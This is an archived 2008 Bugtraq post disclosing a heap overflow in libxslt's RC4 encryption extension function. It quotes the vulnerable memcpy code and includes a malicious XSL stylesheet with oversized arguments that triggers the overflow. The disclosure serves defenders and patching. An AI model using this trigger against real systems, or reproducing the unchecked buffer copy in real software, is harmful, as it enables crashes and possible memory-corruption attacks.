lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 1 Aug 2008 02:03:11 +0100 (BST) From: chris@...ry.beasts.org To: bugtraq@...urityfocus.com Subject: libxslt heap overflow Hi, A heap overflow exists in libxslt when processing a crypto-related built-in function. Full technical details: http://scary.beasts.org/security/CESA-2008-003.html The faulty code can be summarized: static void exsltCryptoRc4EncryptFunction (xmlXPathParserContextPtr ctxt, int nargs) { ... key = xmlXPathPopString (ctxt); key_len = xmlUTF8Strlen (str); ... padkey = xmlMallocAtomic (RC4_KEY_LENGTH); key_size = xmlUTF8Strsize (key, key_len); memcpy (padkey, key, key_size); memset (padkey + key_size, '\0', sizeof (padkey)); ... A statically-sized heap buffer is populated with an arbitrary-length string from an incoming XSL function argument. And the malicious XSL to trigger this: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" xmlns:crypto="http://exslt.org/crypto" xmlns:math="http://exslt.org/math" extension-element-prefixes="str crypto math"> <xsl:template match="/"> <xsl:value-of select="crypto:rc4_encrypt('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')"/> blah </xsl:template> </xsl:stylesheet> Blog post for this, and future issues (with RSS): http://scarybeastsecurity.blogspot.com/2008/07/buffer-overflow-in-libxslt.html http://scarybeastsecurity.blogspot.com/ Cheers Chris
Powered by blists - more mailing lists